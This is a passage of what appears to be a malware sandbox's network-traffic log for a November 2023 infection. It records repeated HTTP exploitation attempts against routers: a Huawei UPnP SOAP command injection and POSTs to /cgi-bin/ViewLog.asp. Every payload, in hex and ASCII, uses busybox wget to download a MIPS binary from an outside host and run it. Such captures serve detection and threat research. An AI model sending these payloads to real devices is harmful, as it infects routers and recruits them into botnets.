                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:16.449080944 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              570192.168.2.145703685.215.47.868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.430831909 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              571192.168.2.146081094.121.124.1898080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.435792923 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              572192.168.2.145745695.254.250.1988080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.568830013 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.873807907 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              573192.168.2.143980662.210.171.818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.737859011 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:54.913605928 CET364INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 23 Nov 2023 04:17:54 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              574192.168.2.144127231.136.123.2028080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.744966030 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.761719942 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.905441046 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:15.936934948 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              575192.168.2.144287631.136.50.1738080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.747138977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.761719942 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.905441046 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:15.936934948 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              576192.168.2.143647431.223.174.1478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.760678053 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:54.962398052 CET465INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 05:17:53 GMT
                                              Server: Webs
                                              X-Frame-Options: SAMEORIGIN
                                              Cache-Control: no-cache
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              577192.168.2.144330294.120.145.818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.785414934 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              578192.168.2.143442485.215.35.1478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:54.862567902 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.079452038 CET683INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:17:54 GMT
                                              Server: Apache/2.4.58 (Unix)
                                              Content-Length: 437
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              579192.168.2.143907894.101.186.1428080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:55.150401115 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
